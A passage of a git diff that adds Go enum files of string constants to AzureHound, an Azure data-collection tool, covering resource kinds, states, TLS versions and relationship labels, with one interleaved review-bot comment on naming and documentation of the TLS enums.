+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type Kind string
+
+const (
+ KindAZApp Kind = "AZApp"
+ KindAZAppMember Kind = "AZAppMember"
+ KindAZAppOwner Kind = "AZAppOwner"
+ KindAZDevice Kind = "AZDevice"
+ KindAZDeviceOwner Kind = "AZDeviceOwner"
+ KindAZGroup Kind = "AZGroup"
+ KindAZGroupMember Kind = "AZGroupMember"
+ KindAZGroupOwner Kind = "AZGroupOwner"
+ KindAZKeyVault Kind = "AZKeyVault"
+ KindAZKeyVaultAccessPolicy Kind = "AZKeyVaultAccessPolicy"
+ KindAZKeyVaultContributor Kind = "AZKeyVaultContributor"
+ KindAZKeyVaultKVContributor Kind = "AZKeyVaultKVContributor"
+ KindAZKeyVaultOwner Kind = "AZKeyVaultOwner"
+ KindAZKeyVaultRoleAssignment Kind = "AZKeyVaultRoleAssignment"
+ KindAZKeyVaultUserAccessAdmin Kind = "AZKeyVaultUserAccessAdmin"
+ KindAZManagementGroup Kind = "AZManagementGroup"
+ KindAZManagementGroupRoleAssignment Kind = "AZManagementGroupRoleAssignment"
+ KindAZManagementGroupOwner Kind = "AZManagementGroupOwner"
+ KindAZManagementGroupDescendant Kind = "AZManagementGroupDescendant"
+ KindAZManagementGroupUserAccessAdmin Kind = "AZManagementGroupUserAccessAdmin"
+ KindAZResourceGroup Kind = "AZResourceGroup"
+ KindAZResourceGroupRoleAssignment Kind = "AZResourceGroupRoleAssignment"
+ KindAZResourceGroupOwner Kind = "AZResourceGroupOwner"
+ KindAZResourceGroupUserAccessAdmin Kind = "AZResourceGroupUserAccessAdmin"
+ KindAZRole Kind = "AZRole"
+ KindAZRoleAssignment Kind = "AZRoleAssignment"
+ KindAZServicePrincipal Kind = "AZServicePrincipal"
+ KindAZServicePrincipalOwner Kind = "AZServicePrincipalOwner"
+ KindAZSubscription Kind = "AZSubscription"
+ KindAZSubscriptionRoleAssignment Kind = "AZSubscriptionRoleAssignment"
+ KindAZSubscriptionOwner Kind = "AZSubscriptionOwner"
+ KindAZSubscriptionUserAccessAdmin Kind = "AZSubscriptionUserAccessAdmin"
+ KindAZTenant Kind = "AZTenant"
+ KindAZUser Kind = "AZUser"
+ KindAZVM Kind = "AZVM"
+ KindAZVMAdminLogin Kind = "AZVMAdminLogin"
+ KindAZVMAvereContributor Kind = "AZVMAvereContributor"
+ KindAZVMContributor Kind = "AZVMContributor"
+ KindAZVMOwner Kind = "AZVMOwner"
+ KindAZVMRoleAssignment Kind = "AZVMRoleAssignment"
+ KindAZVMUserAccessAdmin Kind = "AZVMUserAccessAdmin"
+ KindAZVMVMContributor Kind = "AZVMVMContributor"
+ KindAZAppRoleAssignment Kind = "AZAppRoleAssignment"
+ KindAZStorageAccount Kind = "AZStorageAccount"
+ KindAZStorageAccountRoleAssignment Kind = "AZStorageAccountRoleAssignment"
+ KindAZStorageContainer Kind = "AZStorageContainer"
+ KindAZAutomationAccount Kind = "AZAutomationAccount"
+ KindAZAutomationAccountRoleAssignment Kind = "AZAutomationAccountRoleAssignment"
+ KindAZLogicApp Kind = "AZLogicApp"
+ KindAZLogicAppRoleAssignment Kind = "AZLogicAppRoleAssignment"
+ KindAZFunctionApp Kind = "AZFunctionApp"
+ KindAZFunctionAppRoleAssignment Kind = "AZFunctionAppRoleAssignment"
+ KindAZContainerRegistry Kind = "AZContainerRegistry"
+ KindAZContainerRegistryRoleAssignment Kind = "AZContainerRegistryRoleAssignment"
+ KindAZWebApp Kind = "AZWebApp"
+ KindAZWebAppRoleAssignment Kind = "AZWebAppRoleAssignment"
+ KindAZManagedCluster Kind = "AZManagedCluster"
+ KindAZManagedClusterRoleAssignment Kind = "AZManagedClusterRoleAssignment"
+ KindAZVMScaleSet Kind = "AZVMScaleSet"
+ KindAZVMScaleSetRoleAssignment Kind = "AZVMScaleSetRoleAssignment"
+)
diff --git a/enums/lease_duration.go b/enums/lease_duration.go
new file mode 100644
index 0000000..7030d49
--- /dev/null
+++ b/enums/lease_duration.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LeaseDuration string
+
+const (
+ FixedLeaseDuration LeaseDuration = "Fixed"
+ InfiniteLeaseDuration LeaseDuration = "Infinite"
+)
diff --git a/enums/lease_state.go b/enums/lease_state.go
new file mode 100644
index 0000000..41077cb
--- /dev/null
+++ b/enums/lease_state.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LeaseState string
+
+const (
+ AvailableLeaseState LeaseState = "Available"
+ BreakingLeaseState LeaseState = "Breaking"
+ BrokenLeaseState LeaseState = "Broken"
+ ExpiredLeaseState LeaseState = "Expired"
+ LeasedLeaseState LeaseState = "Leased"
+)
diff --git a/enums/lease_status.go b/enums/lease_status.go
new file mode 100644
index 0000000..70cb71f
--- /dev/null
+++ b/enums/lease_status.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LeaseStatus string
+
+const (
+ LockedLeaseStatus LeaseStatus = "Locked"
+ UnlockedLeaseStatus LeaseStatus = "Unlocked"
+)
diff --git a/enums/legalagegroup.go b/enums/legalagegroup.go
new file mode 100644
index 0000000..f941f3e
--- /dev/null
+++ b/enums/legalagegroup.go
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LegalAgeGroup string
+
+const (
+ // The user is considered a minor based on the age-related regulations of their country or region and the
+ // administrator of the account has obtained appropriate consent from a parent or guardian.
+ LegalAgeGroupMinorWithParentalConsent LegalAgeGroup = "minorWithParentalConsent"
+
+ // The user is considered an adult based on the age-related regulations of their country or region.
+ LegalAgeGroupAdult LegalAgeGroup = "adult"
+
+ // The user is from a country or region that has statutory regulations and the user's age is more than the upper
+ // limit of kid age and less than the lower limit of adult age as defined by the user's country or region.
+ LegalAgeGroupNotAdult LegalAgeGroup = "notAdult"
+
+ // The user is a minor but is from a country or region that has no age-related regulations.
+ LegalAgeGroupMinorNoParentalConsentRequired LegalAgeGroup = "minorNoParentalConsentRequired"
+)
diff --git a/enums/legalagegrouprule.go b/enums/legalagegrouprule.go
new file mode 100644
index 0000000..295433c
--- /dev/null
+++ b/enums/legalagegrouprule.go
@@ -0,0 +1,40 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Specifies the legal age group rule that applies to users of the app.
+type LegalAgeGroupRule string
+
+const (
+ // Enforces the legal minimum This means parental consent is required for minors in the EU and Korea.
+ //
+ // Default
+ LegalAgeGroupRuleAllow LegalAgeGroupRule = "Allow"
+
+ // Enforces the user to specify date of birth to comply with COPPA rules.
+ LegalAgeGroupRuleRequireConsentForPrivacyServices LegalAgeGroupRule = "RequireConsentForPrivacyServices"
+
+ // Requires parental consent for ages below 18, regardless of country minor rules.
+ LegalAgeGroupRuleRequireConsentForMinors LegalAgeGroupRule = "RequireConsentForMinors"
+
+ // Requires parental consent for ages below 14, regardless of country minor rules.
+ LegalAgeGroupRuleRequireConsentForKids LegalAgeGroupRule = "RequireConsentForKids"
+
+ // Blocks minors from using the app.
+ LegalAgeGroupRuleBlockMinors LegalAgeGroupRule = "BlockMinors"
+)
diff --git a/enums/licenseerror.go b/enums/licenseerror.go
new file mode 100644
index 0000000..2eb4282
--- /dev/null
+++ b/enums/licenseerror.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LicenseError string
+
+const (
+ LicenseErrorCountViolation LicenseError = "CountViolation"
+ LicenseErrorMutuallyExclusiveViolation LicenseError = "MutuallyExclusiveViolation"
+ LicenseErrorDependencyViolation LicenseError = "DependencyViolation"
+ LicenseErrorProhibitedInUsageLocationViolation LicenseError = "ProhibitedInUsageLocationViolation"
+ LicenseErrorUniquenessViolation LicenseError = "UniquenessViolation"
+ LicenseErrorOthers LicenseError = "Others"
+)
diff --git a/enums/licenseprocessingstate.go b/enums/licenseprocessingstate.go
new file mode 100644
index 0000000..2980947
--- /dev/null
+++ b/enums/licenseprocessingstate.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LicenseProcessingState string
+
+const (
+ LicenseProcessingStateFalse LicenseProcessingState = "false"
+ LicenseProcessingStateQueued LicenseProcessingState = "QueuedForProcessing"
+ LicenseProcessingStateInProgress LicenseProcessingState = "ProcessingInProgress"
+ LicenseProcessingStateComplete LicenseProcessingState = "ProcessingComplete"
+)
diff --git a/enums/licensestate.go b/enums/licensestate.go
new file mode 100644
index 0000000..341fbbe
--- /dev/null
+++ b/enums/licensestate.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LicenseState string
+
+const (
+ LicenseStateActive LicenseState = "Active"
+ LicenseStateActiveWithError LicenseState = "ActiveWithError"
+ LicenseStateDisabled LicenseState = "Disabled"
+ LicenseStateError LicenseState = "Error"
+)
diff --git a/enums/logic_app_provisioning_state.go b/enums/logic_app_provisioning_state.go
new file mode 100644
index 0000000..1e4816b
--- /dev/null
+++ b/enums/logic_app_provisioning_state.go
@@ -0,0 +1,41 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LogicAppProvisioningState string
+
+const (
+ AcceptedProvisioningState LogicAppProvisioningState = "Accepted"
+ CanceledProvisioningState LogicAppProvisioningState = "Canceled"
+ CompletedProvisioningState LogicAppProvisioningState = "Completed"
+ CreatedProvisioningState LogicAppProvisioningState = "Created"
+ CreatingProvisioningState LogicAppProvisioningState = "Creating"
+ DeletedProvisioningState LogicAppProvisioningState = "Deleted"
+ DeletingProvisioningState LogicAppProvisioningState = "Deleting"
+ FailedProvisioningState LogicAppProvisioningState = "Failed"
+ MovingProvisioningState LogicAppProvisioningState = "Moving"
+ NotSpecifiedProvisioningState LogicAppProvisioningState = "NotSpecified"
+ ReadyProvisioningState LogicAppProvisioningState = "Ready"
+ RegisteredProvisioningState LogicAppProvisioningState = "Registered"
+ RegisteringProvisioningState LogicAppProvisioningState = "Registering"
+ RunningProvisioningState LogicAppProvisioningState = "Running"
+ SucceededProvisioningState LogicAppProvisioningState = "Succeeded"
+ UnregisteredProvisioningState LogicAppProvisioningState = "Unregistered"
+ UnregisteringProvisioningState LogicAppProvisioningState = "Unregistering"
+ UpdatingProvisioningState LogicAppProvisioningState = "Updating"
+)
diff --git a/enums/logic_app_state.go b/enums/logic_app_state.go
new file mode 100644
index 0000000..18e7034
--- /dev/null
+++ b/enums/logic_app_state.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type LogicAppState string
+
+const (
+ CompletedLogicAppState LogicAppState = "Completed"
+ DeletedLogicAppState LogicAppState = "Deleted"
+ DisabledLogicAppState LogicAppState = "Disabled"
+ EnabledLogicAppState LogicAppState = "Enabled"
+ NotSpecifiedLogicAppState LogicAppState = "NotSpecified"
+ SuspendedLogicAppState LogicAppState = "Suspended"
+)
diff --git a/enums/maintenanceoperationcode.go b/enums/maintenanceoperationcode.go
new file mode 100644
index 0000000..d0e487d
--- /dev/null
+++ b/enums/maintenanceoperationcode.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type MaintenanceOperationCode string
+
+const (
+ MaintenanceOperationCodeAborted MaintenanceOperationCode = "MaintenanceAborted"
+ MaintenanceOperationCodeCompleted MaintenanceOperationCode = "MaintenanceCompleted"
+ MaintenanceOperationCodeNone MaintenanceOperationCode = "None"
+ MaintenanceOperationCodeRetryLater MaintenanceOperationCode = "RetryLater"
+)
diff --git a/enums/managed_pipeline_mode.go b/enums/managed_pipeline_mode.go
new file mode 100644
index 0000000..cc5c98c
--- /dev/null
+++ b/enums/managed_pipeline_mode.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ManagedPipelineMode string
+
+const (
+ ClassicPipelineMode ManagedPipelineMode = "Classic"
+ IntegratedPipelineMode ManagedPipelineMode = "Integrated"
+)
diff --git a/enums/messagedeliveryoptions.go b/enums/messagedeliveryoptions.go
new file mode 100644
index 0000000..ff3e462
--- /dev/null
+++ b/enums/messagedeliveryoptions.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type MessageDeliveryOptions string
+
+const (
+ MessageDeliveryOptionsSendToDelegateAndInformationToPrincipal MessageDeliveryOptions = "sendToDelegateAndInformationToPrincipal"
+ MessageDeliveryOptionsSendToDelegateAndPrincipal MessageDeliveryOptions = "sendToDelegateAndPrincipal"
+ MessageDeliveryOptionsSendToDelegateOnly MessageDeliveryOptions = "sendToDelegateOnly"
+)
diff --git a/enums/migration_state.go b/enums/migration_state.go
new file mode 100644
index 0000000..26795c1
--- /dev/null
+++ b/enums/migration_state.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type MigrationState string
+
+const (
+ CompletedMigrationState MigrationState = "Completed"
+ InProgressMigrationState MigrationState = "InProgress"
+)
diff --git a/enums/minimum_tls_version.go b/enums/minimum_tls_version.go
new file mode 100644
index 0000000..98d6c6e
--- /dev/null
+++ b/enums/minimum_tls_version.go
@@ -0,0 +1,30 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type MinimumTlsVersion string
+type SupportedTlsVersions string
+
+const (
+ TLS1_0 MinimumTlsVersion = "TLS1_0"
+ TLS1_1 MinimumTlsVersion = "TLS1_1"
+ TLS1_2 MinimumTlsVersion = "TLS1_2"
+ TLS10 SupportedTlsVersions = "1.0"
+ TLS11 SupportedTlsVersions = "1.1"
+ TLS12 SupportedTlsVersions = "1.2"
+)
diff --git a/enums/networkaction.go b/enums/networkaction.go
new file mode 100644
index 0000000..291bf1f
--- /dev/null
+++ b/enums/networkaction.go
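Review bot: Neither `MinimumTlsVersion` nor `SupportedTlsVersions` has a comment saying which Azure property it models, and the single `const (` block mixes the two spellings (`"TLS1_0"` and `"1.0"`), so a reader cannot tell which constant a given resource field should be compared with. I would add one doc comment per type, for example `// MinimumTlsVersion is the lowest TLS version a resource accepts, in the "TLS1_x" spelling.`, and split the constants into one block per type. Both types are plain strings, so a value outside these three (a newer protocol version, for instance) still decodes without error; code that flags weak TLS settings from this data should treat unknown values explicitly instead of assuming one of the listed constants. The identifiers also depart from Go's MixedCaps and initialism conventions (`MinimumTLSVersion` rather than `MinimumTlsVersion`, no underscores), if renaming is still cheap at this point.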
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// The default action when no rule from ipRules and from virtualNetworkRules match. This is only used after the bypass
+// property has been evaluated.
+type NetworkAction string
+
+const (
+ NetworkActionAllow NetworkAction = "Allow"
+ NetworkActionDeny NetworkAction = "Deny"
+)
diff --git a/enums/parameter_type.go b/enums/parameter_type.go
new file mode 100644
index 0000000..e25f01b
--- /dev/null
+++ b/enums/parameter_type.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type ParameterType string
+
+const (
+ ArrayType ParameterType = "Array"
+ BoolType ParameterType = "Bool"
+ FloatType ParameterType = "Float"
+ IntType ParameterType = "Int"
+ NotSpecifiedType ParameterType = "NotSpecified"
+ ObjectType ParameterType = "Object"
+ SecureObjectType ParameterType = "SecureObject"
+ SecureStringType ParameterType = "SecureString"
+ StringType ParameterType = "String"
+)
diff --git a/enums/patchstatus.go b/enums/patchstatus.go
new file mode 100644
index 0000000..b470a7c
--- /dev/null
+++ b/enums/patchstatus.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type PatchStatus string
+
+const (
+ PatchStatusCompletedWithWarnings PatchStatus = "CompletedWithWarnings"
+ PatchStatusFailed PatchStatus = "Failed"
+ PatchStatusInProgress PatchStatus = "InProgress"
+ PatchStatusSucceeded PatchStatus = "Succeeded"
+ PatchStatusUnknown PatchStatus = "Unknown"
+)
diff --git a/enums/redundancy_mode.go b/enums/redundancy_mode.go
new file mode 100644
index 0000000..66e9584
--- /dev/null
+++ b/enums/redundancy_mode.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type RedundancyMode string
+
+const (
+ ActiveActiveRedundancyMode RedundancyMode = "ActiveActive"
+ FailoverRedundancyMode RedundancyMode = "Failover"
+ GeoRedundantRedundancyMode RedundancyMode = "GeoRedundant"
+ ManualRedundancyMode RedundancyMode = "Manual"
+ NoneRedundancyMode RedundancyMode = "None"
+)
diff --git a/enums/relationship.go b/enums/relationship.go
new file mode 100644
index 0000000..4dcbfbe
--- /dev/null
+++ b/enums/relationship.go
@@ -0,0 +1,48 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+type Relationship string
+
+// relationshiperated relationships
+const (
+ RelationshipAZAvereContributor Relationship = "AZAvereContributor"
+ RelationshipAZContains Relationship = "AZContains"
+ RelationshipAZContributor Relationship = "AZContributor"
+ RelationshipAZGetCertificates Relationship = "AZGetCertificates"
+ RelationshipAZGetKeys Relationship = "AZGetKeys"
+ RelationshipAZGetSecrets Relationship = "AZGetSecrets"
+ RelationshipAZHasRole Relationship = "AZHasRole"
+ RelationshipAZMemberOf Relationship = "AZMemberOf"
+ RelationshipAZOwner Relationship = "AZOwner"
+ RelationshipAZRunsAs Relationship = "AZRunsAs"
+ RelationshipAZVMContributor Relationship = "AZVMContributor"
+)
+
+// Post-processed relationships
+const (
+ RelationshipAZAddMembers Relationship = "AZAddMembers"
+ RelationshipAZAddSecret Relationship = "AZAddSecret"
+ RelationshipAZExecuteCommand Relationship = "AZExecuteCommand"
+ RelationshipAZGlobalAdmin Relationship = "AZGlobalAdmin"
+ RelationshipAZGrant Relationship = "AZGrant"
+ RelationshipAZGrantSelf Relationship = "AZGrantSelf"
+ RelationshipAZPrivilegedRoleAdmin Relationship = "AZPrivilegedRoleAdmin"
+ RelationshipAZAZResetPassword Relationship = "AZAZResetPassword"
+ RelationshipAZUserAccessAdministrator Relationship = "AZUserAccessAdministrator"
+)
diff --git a/enums/resourcebehavior.go b/enums/resourcebehavior.go
new file mode 100644
index 0000000..6942a8f
--- /dev/null
+++ b/enums/resourcebehavior.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package enums
+
+// Specifies group behaviors for a Microsoft 365 group
+type ResourceBehavior string
+
+const (
+ // Only group members can post conversations to the group.
+ // If unset ny user in the organization can post conversations to the group.
+ ResourceBehaviorAllowOnlyMembersToPost ResourceBehavior = "AllowOnlyMembersToPost"
+
+ // This group is hidden in Outlook experiences.
+ // If unset all groups are visible and discoverable in Outlook experiences.
+ ResourceBehaviorHideGroupInOutlook ResourceBehavior = "HideGroupInOutlook"
+
+ // Group members are subscribed to receive group conversations.
+ // If unset Group members do not receive group conversations.
+ ResourceBehaviorSubscribeNewGroupMembers ResourceBehavior = "SubscribeNewGroupMembers"
+
+ // Welcome emails are not sent to new members.
+ // If unset A welcome email is sent to a new member on joining the group.
